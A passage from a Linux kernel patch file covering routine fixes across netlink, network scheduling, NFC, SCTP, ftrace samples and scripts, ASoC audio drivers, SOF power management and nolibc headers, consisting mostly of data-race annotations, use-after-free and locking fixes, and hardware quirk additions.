+ 	sock_hold(sk);
+ 
+ 	err = __netlink_insert(table, sk);
+@@ -1085,9 +1087,11 @@ static int netlink_connect(struct socket *sock, struct sockaddr *addr,
+ 		return -EINVAL;
+ 
+ 	if (addr->sa_family == AF_UNSPEC) {
+-		sk->sk_state	= NETLINK_UNCONNECTED;
+-		nlk->dst_portid	= 0;
+-		nlk->dst_group  = 0;
++		/* paired with READ_ONCE() in netlink_getsockbyportid() */
++		WRITE_ONCE(sk->sk_state, NETLINK_UNCONNECTED);
++		/* dst_portid and dst_group can be read locklessly */
++		WRITE_ONCE(nlk->dst_portid, 0);
++		WRITE_ONCE(nlk->dst_group, 0);
+ 		return 0;
+ 	}
+ 	if (addr->sa_family != AF_NETLINK)
+@@ -1108,9 +1112,11 @@ static int netlink_connect(struct socket *sock, struct sockaddr *addr,
+ 		err = netlink_autobind(sock);
+ 
+ 	if (err == 0) {
+-		sk->sk_state	= NETLINK_CONNECTED;
+-		nlk->dst_portid = nladdr->nl_pid;
+-		nlk->dst_group  = ffs(nladdr->nl_groups);
++		/* paired with READ_ONCE() in netlink_getsockbyportid() */
++		WRITE_ONCE(sk->sk_state, NETLINK_CONNECTED);
++		/* dst_portid and dst_group can be read locklessly */
++		WRITE_ONCE(nlk->dst_portid, nladdr->nl_pid);
++		WRITE_ONCE(nlk->dst_group, ffs(nladdr->nl_groups));
+ 	}
+ 
+ 	return err;
+@@ -1127,10 +1133,12 @@ static int netlink_getname(struct socket *sock, struct sockaddr *addr,
+ 	nladdr->nl_pad = 0;
+ 
+ 	if (peer) {
+-		nladdr->nl_pid = nlk->dst_portid;
+-		nladdr->nl_groups = netlink_group_mask(nlk->dst_group);
++		/* Paired with WRITE_ONCE() in netlink_connect() */
++		nladdr->nl_pid = READ_ONCE(nlk->dst_portid);
++		nladdr->nl_groups = netlink_group_mask(READ_ONCE(nlk->dst_group));
+ 	} else {
+-		nladdr->nl_pid = nlk->portid;
++		/* Paired with WRITE_ONCE() in netlink_insert() */
++		nladdr->nl_pid = READ_ONCE(nlk->portid);
+ 		netlink_lock_table();
+ 		nladdr->nl_groups = nlk->groups ? nlk->groups[0] : 0;
+ 		netlink_unlock_table();
+@@ -1157,8 +1165,9 @@ static struct sock *netlink_getsockbyportid(struct sock *ssk, u32 portid)
+ 
+ 	/* Don't bother queuing skb if kernel socket has no input function */
+ 	nlk = nlk_sk(sock);
+-	if (sock->sk_state == NETLINK_CONNECTED &&
+-	    nlk->dst_portid != nlk_sk(ssk)->portid) {
++	/* dst_portid and sk_state can be changed in netlink_connect() */
++	if (READ_ONCE(sock->sk_state) == NETLINK_CONNECTED &&
++	    READ_ONCE(nlk->dst_portid) != nlk_sk(ssk)->portid) {
+ 		sock_put(sock);
+ 		return ERR_PTR(-ECONNREFUSED);
+ 	}
+@@ -1875,8 +1884,9 @@ static int netlink_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 			goto out;
+ 		netlink_skb_flags |= NETLINK_SKB_DST;
+ 	} else {
+-		dst_portid = nlk->dst_portid;
+-		dst_group = nlk->dst_group;
++		/* Paired with WRITE_ONCE() in netlink_connect() */
++		dst_portid = READ_ONCE(nlk->dst_portid);
++		dst_group = READ_ONCE(nlk->dst_group);
+ 	}
+ 
+ 	/* Paired with WRITE_ONCE() in netlink_insert() */
+diff --git a/net/netrom/nr_timer.c b/net/netrom/nr_timer.c
+index a8da88db7893f..4e7c968cde2dc 100644
+--- a/net/netrom/nr_timer.c
++++ b/net/netrom/nr_timer.c
+@@ -121,6 +121,7 @@ static void nr_heartbeat_expiry(struct timer_list *t)
+ 		   is accepted() it isn't 'dead' so doesn't get removed. */
+ 		if (sock_flag(sk, SOCK_DESTROY) ||
+ 		    (sk->sk_state == TCP_LISTEN && sock_flag(sk, SOCK_DEAD))) {
++			sock_hold(sk);
+ 			bh_unlock_sock(sk);
+ 			nr_destroy_socket(sk);
+ 			goto out;
+diff --git a/net/nfc/llcp_core.c b/net/nfc/llcp_core.c
+index 3364caabef8b1..a27e1842b2a09 100644
+--- a/net/nfc/llcp_core.c
++++ b/net/nfc/llcp_core.c
+@@ -157,6 +157,7 @@ static void local_cleanup(struct nfc_llcp_local *local)
+ 	cancel_work_sync(&local->rx_work);
+ 	cancel_work_sync(&local->timeout_work);
+ 	kfree_skb(local->rx_pending);
++	local->rx_pending = NULL;
+ 	del_timer_sync(&local->sdreq_timer);
+ 	cancel_work_sync(&local->sdreq_timeout_work);
+ 	nfc_llcp_free_sdp_tlv_list(&local->pending_sdreqs);
+diff --git a/net/sched/sch_gred.c b/net/sched/sch_gred.c
+index a661b062cca85..872d127c9db42 100644
+--- a/net/sched/sch_gred.c
++++ b/net/sched/sch_gred.c
+@@ -377,6 +377,7 @@ static int gred_offload_dump_stats(struct Qdisc *sch)
+ 	/* Even if driver returns failure adjust the stats - in case offload
+ 	 * ended but driver still wants to adjust the values.
+ 	 */
++	sch_tree_lock(sch);
+ 	for (i = 0; i < MAX_DPs; i++) {
+ 		if (!table->tab[i])
+ 			continue;
+@@ -393,6 +394,7 @@ static int gred_offload_dump_stats(struct Qdisc *sch)
+ 		sch->qstats.overlimits += hw_stats->stats.qstats[i].overlimits;
+ 	}
+ 	_bstats_update(&sch->bstats, bytes, packets);
++	sch_tree_unlock(sch);
+ 
+ 	kfree(hw_stats);
+ 	return ret;
+diff --git a/net/sched/sch_htb.c b/net/sched/sch_htb.c
+index e5b4bbf3ce3d5..3afac9c21a763 100644
+--- a/net/sched/sch_htb.c
++++ b/net/sched/sch_htb.c
+@@ -1545,7 +1545,7 @@ static int htb_destroy_class_offload(struct Qdisc *sch, struct htb_class *cl,
+ 	struct tc_htb_qopt_offload offload_opt;
+ 	struct netdev_queue *dev_queue;
+ 	struct Qdisc *q = cl->leaf.q;
+-	struct Qdisc *old = NULL;
++	struct Qdisc *old;
+ 	int err;
+ 
+ 	if (cl->level)
+@@ -1553,14 +1553,17 @@ static int htb_destroy_class_offload(struct Qdisc *sch, struct htb_class *cl,
+ 
+ 	WARN_ON(!q);
+ 	dev_queue = htb_offload_get_queue(cl);
+-	old = htb_graft_helper(dev_queue, NULL);
+-	if (destroying)
+-		/* Before HTB is destroyed, the kernel grafts noop_qdisc to
+-		 * all queues.
++	/* When destroying, caller qdisc_graft grafts the new qdisc and invokes
++	 * qdisc_put for the qdisc being destroyed. htb_destroy_class_offload
++	 * does not need to graft or qdisc_put the qdisc being destroyed.
++	 */
++	if (!destroying) {
++		old = htb_graft_helper(dev_queue, NULL);
++		/* Last qdisc grafted should be the same as cl->leaf.q when
++		 * calling htb_delete.
+ 		 */
+-		WARN_ON(!(old->flags & TCQ_F_BUILTIN));
+-	else
+ 		WARN_ON(old != q);
++	}
+ 
+ 	if (cl->parent) {
+ 		_bstats_update(&cl->parent->bstats_bias,
+@@ -1577,10 +1580,12 @@ static int htb_destroy_class_offload(struct Qdisc *sch, struct htb_class *cl,
+ 	};
+ 	err = htb_offload(qdisc_dev(sch), &offload_opt);
+ 
+-	if (!err || destroying)
+-		qdisc_put(old);
+-	else
+-		htb_graft_helper(dev_queue, old);
++	if (!destroying) {
++		if (!err)
++			qdisc_put(old);
++		else
++			htb_graft_helper(dev_queue, old);
++	}
+ 
+ 	if (last_child)
+ 		return err;
+diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
+index 570389f6cdd7d..c322a61eaeeac 100644
+--- a/net/sched/sch_taprio.c
++++ b/net/sched/sch_taprio.c
+@@ -1700,6 +1700,7 @@ static void taprio_reset(struct Qdisc *sch)
+ 	int i;
+ 
+ 	hrtimer_cancel(&q->advance_timer);
++
+ 	if (q->qdiscs) {
+ 		for (i = 0; i < dev->num_tx_queues; i++)
+ 			if (q->qdiscs[i])
+@@ -1720,6 +1721,7 @@ static void taprio_destroy(struct Qdisc *sch)
+ 	 * happens in qdisc_create(), after taprio_init() has been called.
+ 	 */
+ 	hrtimer_cancel(&q->advance_timer);
++	qdisc_synchronize(sch);
+ 
+ 	taprio_disable_offload(dev, q, NULL);
+ 
+diff --git a/net/sctp/bind_addr.c b/net/sctp/bind_addr.c
+index 59e653b528b1f..6b95d3ba8fe1c 100644
+--- a/net/sctp/bind_addr.c
++++ b/net/sctp/bind_addr.c
+@@ -73,6 +73,12 @@ int sctp_bind_addr_copy(struct net *net, struct sctp_bind_addr *dest,
+ 		}
+ 	}
+ 
++	/* If somehow no addresses were found that can be used with this
++	 * scope, it's an error.
++	 */
++	if (list_empty(&dest->address_list))
++		error = -ENETUNREACH;
++
+ out:
+ 	if (error)
+ 		sctp_bind_addr_clean(dest);
+diff --git a/samples/ftrace/ftrace-direct-multi-modify.c b/samples/ftrace/ftrace-direct-multi-modify.c
+index 65aa94d96f4e3..6f23b1413745c 100644
+--- a/samples/ftrace/ftrace-direct-multi-modify.c
++++ b/samples/ftrace/ftrace-direct-multi-modify.c
+@@ -149,6 +149,7 @@ static void __exit ftrace_direct_multi_exit(void)
+ {
+ 	kthread_stop(simple_tsk);
+ 	unregister_ftrace_direct_multi(&direct, my_tramp);
++	ftrace_free_filter(&direct);
+ }
+ 
+ module_init(ftrace_direct_multi_init);
+diff --git a/samples/ftrace/ftrace-direct-multi.c b/samples/ftrace/ftrace-direct-multi.c
+index 41ded7c615c7f..a9a5c90fb2044 100644
+--- a/samples/ftrace/ftrace-direct-multi.c
++++ b/samples/ftrace/ftrace-direct-multi.c
+@@ -77,6 +77,7 @@ static int __init ftrace_direct_multi_init(void)
+ static void __exit ftrace_direct_multi_exit(void)
+ {
+ 	unregister_ftrace_direct_multi(&direct, (unsigned long) my_tramp);
++	ftrace_free_filter(&direct);
+ }
+ 
+ module_init(ftrace_direct_multi_init);
+diff --git a/scripts/atomic/atomics.tbl b/scripts/atomic/atomics.tbl
+old mode 100755
+new mode 100644
+diff --git a/scripts/tracing/ftrace-bisect.sh b/scripts/tracing/ftrace-bisect.sh
+index 926701162bc83..bb4f59262bbe9 100755
+--- a/scripts/tracing/ftrace-bisect.sh
++++ b/scripts/tracing/ftrace-bisect.sh
+@@ -12,7 +12,7 @@
+ #   (note, if this is a problem with function_graph tracing, then simply
+ #    replace "function" with "function_graph" in the following steps).
+ #
+-#  # cd /sys/kernel/debug/tracing
++#  # cd /sys/kernel/tracing
+ #  # echo schedule > set_ftrace_filter
+ #  # echo function > current_tracer
+ #
+@@ -20,22 +20,40 @@
+ #
+ #  # echo nop > current_tracer
+ #
+-#  # cat available_filter_functions > ~/full-file
++# Starting with v5.1 this can be done with numbers, making it much faster:
++#
++# The old (slow) way, for kernels before v5.1.
++#
++# [old-way] # cat available_filter_functions > ~/full-file
++#
++# [old-way] *** Note ***  this process will take several minutes to update the
++# [old-way] filters. Setting multiple functions is an O(n^2) operation, and we
++# [old-way] are dealing with thousands of functions. So go have coffee, talk
++# [old-way] with your coworkers, read facebook. And eventually, this operation
++# [old-way] will end.
++#
++# The new way (using numbers) is an O(n) operation, and usually takes less than a second.
++#
++# seq `wc -l available_filter_functions | cut -d' ' -f1` > ~/full-file
++#
++# This will create a sequence of numbers that match the functions in
++# available_filter_functions, and when echoing in a number into the
++# set_ftrace_filter file, it will enable the corresponding function in
++# O(1) time. Making enabling all functions O(n) where n is the number of
++# functions to enable.
++#
++# For either the new or old way, the rest of the operations remain the same.
++#
+ #  # ftrace-bisect ~/full-file ~/test-file ~/non-test-file
+ #  # cat ~/test-file > set_ftrace_filter
+ #
+-# *** Note *** this will take several minutes. Setting multiple functions is
+-# an O(n^2) operation, and we are dealing with thousands of functions. So go
+-# have  coffee, talk with your coworkers, read facebook. And eventually, this
+-# operation will end.
+-#
+ #  # echo function > current_tracer
+ #
+ # If it crashes, we know that ~/test-file has a bad function.
+ #
+ #   Reboot back to test kernel.
+ #
+-#     # cd /sys/kernel/debug/tracing
++#     # cd /sys/kernel/tracing
+ #     # mv ~/test-file ~/full-file
+ #
+ # If it didn't crash.
+diff --git a/security/tomoyo/Makefile b/security/tomoyo/Makefile
+index cca5a3012fee2..221eaadffb09c 100644
+--- a/security/tomoyo/Makefile
++++ b/security/tomoyo/Makefile
+@@ -10,7 +10,7 @@ endef
+ quiet_cmd_policy  = POLICY  $@
+       cmd_policy  = ($(call do_policy,profile); $(call do_policy,exception_policy); $(call do_policy,domain_policy); $(call do_policy,manager); $(call do_policy,stat)) >$@
+ 
+-$(obj)/builtin-policy.h: $(wildcard $(obj)/policy/*.conf $(src)/policy/*.conf.default) FORCE
++$(obj)/builtin-policy.h: $(wildcard $(obj)/policy/*.conf $(srctree)/$(src)/policy/*.conf.default) FORCE
+ 	$(call if_changed,policy)
+ 
+ $(obj)/common.o: $(obj)/builtin-policy.h
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 1f0b5527c5949..0d283e41f66dc 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -206,6 +206,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "UM5302TA"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "M5402RA"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -220,6 +227,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 14 2022"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Razer"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Blade 14 (2022) - RZ09-0427"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/es8326.c b/sound/soc/codecs/es8326.c
+old mode 100755
+new mode 100644
+diff --git a/sound/soc/codecs/es8326.h b/sound/soc/codecs/es8326.h
+old mode 100755
+new mode 100644
+diff --git a/sound/soc/fsl/fsl-asoc-card.c b/sound/soc/fsl/fsl-asoc-card.c
+index c836848ef0a65..8d14b5593658d 100644
+--- a/sound/soc/fsl/fsl-asoc-card.c
++++ b/sound/soc/fsl/fsl-asoc-card.c
+@@ -121,11 +121,11 @@ static const struct snd_soc_dapm_route audio_map[] = {
+ 
+ static const struct snd_soc_dapm_route audio_map_ac97[] = {
+ 	/* 1st half -- Normal DAPM routes */
+-	{"Playback",  NULL, "AC97 Playback"},
+-	{"AC97 Capture",  NULL, "Capture"},
++	{"AC97 Playback",  NULL, "CPU AC97 Playback"},
++	{"CPU AC97 Capture",  NULL, "AC97 Capture"},
+ 	/* 2nd half -- ASRC DAPM routes */
+-	{"AC97 Playback",  NULL, "ASRC-Playback"},
+-	{"ASRC-Capture",  NULL, "AC97 Capture"},
++	{"CPU AC97 Playback",  NULL, "ASRC-Playback"},
++	{"ASRC-Capture",  NULL, "CPU AC97 Capture"},
+ };
+ 
+ static const struct snd_soc_dapm_route audio_map_tx[] = {
+diff --git a/sound/soc/fsl/fsl_micfil.c b/sound/soc/fsl/fsl_micfil.c
+index 4b86ef82fd930..4b8fe9b8be407 100644
+--- a/sound/soc/fsl/fsl_micfil.c
++++ b/sound/soc/fsl/fsl_micfil.c
+@@ -154,21 +154,21 @@ static int micfil_quality_set(struct snd_kcontrol *kcontrol,
+ 
+ static const struct snd_kcontrol_new fsl_micfil_snd_controls[] = {
+ 	SOC_SINGLE_SX_TLV("CH0 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(0), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(0), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH1 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(1), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(1), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH2 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(2), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(2), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH3 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(3), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(3), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH4 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(4), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(4), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH5 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(5), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(5), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH6 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(6), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(6), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH7 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(7), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(7), 0x8, 0xF, gain_tlv),
+ 	SOC_ENUM_EXT("MICFIL Quality Select",
+ 		     fsl_micfil_quality_enum,
+ 		     micfil_quality_get, micfil_quality_set),
+diff --git a/sound/soc/fsl/fsl_ssi.c b/sound/soc/fsl/fsl_ssi.c
+index c9e0e31d5b34d..46a53551b955c 100644
+--- a/sound/soc/fsl/fsl_ssi.c
++++ b/sound/soc/fsl/fsl_ssi.c
+@@ -1189,14 +1189,14 @@ static struct snd_soc_dai_driver fsl_ssi_ac97_dai = {
+ 	.symmetric_channels = 1,
+ 	.probe = fsl_ssi_dai_probe,
+ 	.playback = {
+-		.stream_name = "AC97 Playback",
++		.stream_name = "CPU AC97 Playback",
+ 		.channels_min = 2,
+ 		.channels_max = 2,
+ 		.rates = SNDRV_PCM_RATE_8000_48000,
+ 		.formats = SNDRV_PCM_FMTBIT_S16 | SNDRV_PCM_FMTBIT_S20,
+ 	},
+ 	.capture = {
+-		.stream_name = "AC97 Capture",
++		.stream_name = "CPU AC97 Capture",
+ 		.channels_min = 2,
+ 		.channels_max = 2,
+ 		.rates = SNDRV_PCM_RATE_48000,
+diff --git a/sound/soc/mediatek/Kconfig b/sound/soc/mediatek/Kconfig
+index 363fa4d476800..b027fba8233df 100644
+--- a/sound/soc/mediatek/Kconfig
++++ b/sound/soc/mediatek/Kconfig
+@@ -182,10 +182,12 @@ config SND_SOC_MT8186_MT6366_DA7219_MAX98357
+ 	  If unsure select "N".
+ 
+ config SND_SOC_MT8186_MT6366_RT1019_RT5682S
+-	tristate "ASoC Audio driver for MT8186 with RT1019 RT5682S codec"
++	tristate "ASoC Audio driver for MT8186 with RT1019 RT5682S MAX98357A/MAX98360 codec"
+ 	depends on I2C && GPIOLIB
+ 	depends on SND_SOC_MT8186 && MTK_PMIC_WRAP
++	select SND_SOC_MAX98357A
+ 	select SND_SOC_MT6358
++	select SND_SOC_MAX98357A
+ 	select SND_SOC_RT1015P
+ 	select SND_SOC_RT5682S
+ 	select SND_SOC_BT_SCO
+diff --git a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+index 60fa55d0c91f0..6babadb2e6fe2 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
++++ b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+@@ -991,6 +991,21 @@ static struct snd_soc_card mt8186_mt6366_rt1019_rt5682s_soc_card = {
+ 	.num_configs = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_codec_conf),
+ };
+ 
++static struct snd_soc_card mt8186_mt6366_rt5682s_max98360_soc_card = {
++	.name = "mt8186_rt5682s_max98360",
++	.owner = THIS_MODULE,
++	.dai_link = mt8186_mt6366_rt1019_rt5682s_dai_links,
++	.num_links = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_dai_links),
++	.controls = mt8186_mt6366_rt1019_rt5682s_controls,
++	.num_controls = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_controls),
++	.dapm_widgets = mt8186_mt6366_rt1019_rt5682s_widgets,
++	.num_dapm_widgets = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_widgets),
++	.dapm_routes = mt8186_mt6366_rt1019_rt5682s_routes,
++	.num_dapm_routes = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_routes),
++	.codec_conf = mt8186_mt6366_rt1019_rt5682s_codec_conf,
++	.num_configs = ARRAY_SIZE(mt8186_mt6366_rt1019_rt5682s_codec_conf),
++};
++
+ static int mt8186_mt6366_rt1019_rt5682s_dev_probe(struct platform_device *pdev)
+ {
+ 	struct snd_soc_card *card;
+@@ -1132,9 +1147,14 @@ err_adsp_node:
+ 
+ #if IS_ENABLED(CONFIG_OF)
+ static const struct of_device_id mt8186_mt6366_rt1019_rt5682s_dt_match[] = {
+-	{	.compatible = "mediatek,mt8186-mt6366-rt1019-rt5682s-sound",
++	{
++		.compatible = "mediatek,mt8186-mt6366-rt1019-rt5682s-sound",
+ 		.data = &mt8186_mt6366_rt1019_rt5682s_soc_card,
+ 	},
++	{
++		.compatible = "mediatek,mt8186-mt6366-rt5682s-max98360-sound",
++		.data = &mt8186_mt6366_rt5682s_max98360_soc_card,
++	},
+ 	{}
+ };
+ #endif
+diff --git a/sound/soc/sof/debug.c b/sound/soc/sof/debug.c
+index d9a3ce7b69e16..ade0507328af4 100644
+--- a/sound/soc/sof/debug.c
++++ b/sound/soc/sof/debug.c
+@@ -353,7 +353,9 @@ int snd_sof_dbg_init(struct snd_sof_dev *sdev)
+ 			return err;
+ 	}
+ 
+-	return 0;
++	return snd_sof_debugfs_buf_item(sdev, &sdev->fw_state,
++					sizeof(sdev->fw_state),
++					"fw_state", 0444);
+ }
+ EXPORT_SYMBOL_GPL(snd_sof_dbg_init);
+ 
+diff --git a/sound/soc/sof/pm.c b/sound/soc/sof/pm.c
+index df740be645e84..8722bbd7fd3d7 100644
+--- a/sound/soc/sof/pm.c
++++ b/sound/soc/sof/pm.c
+@@ -182,7 +182,7 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	const struct sof_ipc_pm_ops *pm_ops = sdev->ipc->ops->pm;
+ 	const struct sof_ipc_tplg_ops *tplg_ops = sdev->ipc->ops->tplg;
+ 	pm_message_t pm_state;
+-	u32 target_state = 0;
++	u32 target_state = snd_sof_dsp_power_target(sdev);
+ 	int ret;
+ 
+ 	/* do nothing if dsp suspend callback is not set */
+@@ -192,6 +192,9 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	if (runtime_suspend && !sof_ops(sdev)->runtime_suspend)
+ 		return 0;
+ 
++	if (tplg_ops && tplg_ops->tear_down_all_pipelines)
++		tplg_ops->tear_down_all_pipelines(sdev, false);
++
+ 	if (sdev->fw_state != SOF_FW_BOOT_COMPLETE)
+ 		goto suspend;
+ 
+@@ -206,7 +209,6 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 		}
+ 	}
+ 
+-	target_state = snd_sof_dsp_power_target(sdev);
+ 	pm_state.event = target_state;
+ 
+ 	/* Skip to platform-specific suspend if DSP is entering D0 */
+@@ -217,9 +219,6 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 		goto suspend;
+ 	}
+ 
+-	if (tplg_ops->tear_down_all_pipelines)
+-		tplg_ops->tear_down_all_pipelines(sdev, false);
+-
+ 	/* suspend DMA trace */
+ 	sof_fw_trace_suspend(sdev, pm_state);
+ 
+diff --git a/tools/gpio/gpio-event-mon.c b/tools/gpio/gpio-event-mon.c
+index 6c122952c5892..5dee2b98ab604 100644
+--- a/tools/gpio/gpio-event-mon.c
++++ b/tools/gpio/gpio-event-mon.c
+@@ -86,6 +86,7 @@ int monitor_device(const char *device_name,
+ 			gpiotools_test_bit(values.bits, i));
+ 	}
+ 
++	i = 0;
+ 	while (1) {
+ 		struct gpio_v2_line_event event;
+ 
+diff --git a/tools/include/nolibc/ctype.h b/tools/include/nolibc/ctype.h
+index e3000b2992d7b..6f90706d06442 100644
+--- a/tools/include/nolibc/ctype.h
++++ b/tools/include/nolibc/ctype.h
+@@ -96,4 +96,7 @@ int ispunct(int c)
+ 	return isgraph(c) && !isalnum(c);
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_CTYPE_H */
+diff --git a/tools/include/nolibc/errno.h b/tools/include/nolibc/errno.h
+index 06893d6dfb7a6..9dc4919c769b7 100644
+--- a/tools/include/nolibc/errno.h
++++ b/tools/include/nolibc/errno.h
+@@ -24,4 +24,7 @@ static int errno;
+  */
+ #define MAX_ERRNO 4095
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_ERRNO_H */
+diff --git a/tools/include/nolibc/signal.h b/tools/include/nolibc/signal.h
+index ef47e71e2be37..137552216e469 100644
+--- a/tools/include/nolibc/signal.h
++++ b/tools/include/nolibc/signal.h
+@@ -19,4 +19,7 @@ int raise(int signal)
+ 	return sys_kill(sys_getpid(), signal);
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_SIGNAL_H */
+diff --git a/tools/include/nolibc/stdio.h b/tools/include/nolibc/stdio.h
+index a3cebc4bc3ac4..96ac8afc5aeed 100644
+--- a/tools/include/nolibc/stdio.h
++++ b/tools/include/nolibc/stdio.h
+@@ -303,4 +303,7 @@ void perror(const char *msg)
+ 	fprintf(stderr, "%s%serrno=%d\n", (msg && *msg) ? msg : "", (msg && *msg) ? ": " : "", errno);
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_STDIO_H */
+diff --git a/tools/include/nolibc/stdlib.h b/tools/include/nolibc/stdlib.h
+index 92378c4b96605..a24000d1e8222 100644
+--- a/tools/include/nolibc/stdlib.h
++++ b/tools/include/nolibc/stdlib.h
+@@ -419,4 +419,7 @@ char *u64toa(uint64_t in)
+ 	return itoa_buffer;
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_STDLIB_H */
+diff --git a/tools/include/nolibc/string.h b/tools/include/nolibc/string.h
+index ad97c0d522b8e..fffdaf6ff4673 100644
+--- a/tools/include/nolibc/string.h
++++ b/tools/include/nolibc/string.h
+@@ -88,8 +88,11 @@ void *memset(void *dst, int b, size_t len)
+ {
+ 	char *p = dst;
+ 
+-	while (len--)
++	while (len--) {
++		/* prevent gcc from recognizing memset() here */
++		asm volatile("");
+ 		*(p++) = b;
++	}
+ 	return dst;
+ }
+ 
+@@ -285,4 +288,7 @@ char *strrchr(const char *s, int c)
+ 	return (char *)ret;
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_STRING_H */
+diff --git a/tools/include/nolibc/sys.h b/tools/include/nolibc/sys.h
+index ce3ee03aa6794..78473d34e27cd 100644
+--- a/tools/include/nolibc/sys.h
++++ b/tools/include/nolibc/sys.h
+@@ -1243,5 +1243,7 @@ ssize_t write(int fd, const void *buf, size_t count)
+ 	return ret;
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
+ 
+ #endif /* _NOLIBC_SYS_H */
+diff --git a/tools/include/nolibc/time.h b/tools/include/nolibc/time.h
+index d18b7661fdd71..84655361b9ad2 100644
+--- a/tools/include/nolibc/time.h
++++ b/tools/include/nolibc/time.h
+@@ -25,4 +25,7 @@ time_t time(time_t *tptr)
+ 	return tv.tv_sec;
+ }
+ 
++/* make sure to include all global symbols */
++#include "nolibc.h"
++
+ #endif /* _NOLIBC_TIME_H */
+diff --git a/tools/include/nolibc/types.h b/tools/include/nolibc/types.h
+index 959997034e553..fbbc0e68c001b 100644
+--- a/tools/include/nolibc/types.h
++++ b/tools/include/nolibc/types.h
+@@ -26,13 +26,13 @@
+ #define S_IFSOCK       0140000
+ #define S_IFMT         0170000
+ 
+-#define S_ISDIR(mode)  (((mode) & S_IFDIR)  == S_IFDIR)
+-#define S_ISCHR(mode)  (((mode) & S_IFCHR)  == S_IFCHR)
+-#define S_ISBLK(mode)  (((mode) & S_IFBLK)  == S_IFBLK)
+-#define S_ISREG(mode)  (((mode) & S_IFREG)  == S_IFREG)
+-#define S_ISFIFO(mode) (((mode) & S_IFIFO)  == S_IFIFO)
+-#define S_ISLNK(mode)  (((mode) & S_IFLNK)  == S_IFLNK)
+-#define S_ISSOCK(mode) (((mode) & S_IFSOCK) == S_IFSOCK)
++#define S_ISDIR(mode)  (((mode) & S_IFMT) == S_IFDIR)
++#define S_ISCHR(mode)  (((mode) & S_IFMT) == S_IFCHR)
++#define S_ISBLK(mode)  (((mode) & S_IFMT) == S_IFBLK)
++#define S_ISREG(mode)  (((mode) & S_IFMT) == S_IFREG)
++#define S_ISFIFO(mode) (((mode) & S_IFMT) == S_IFIFO)
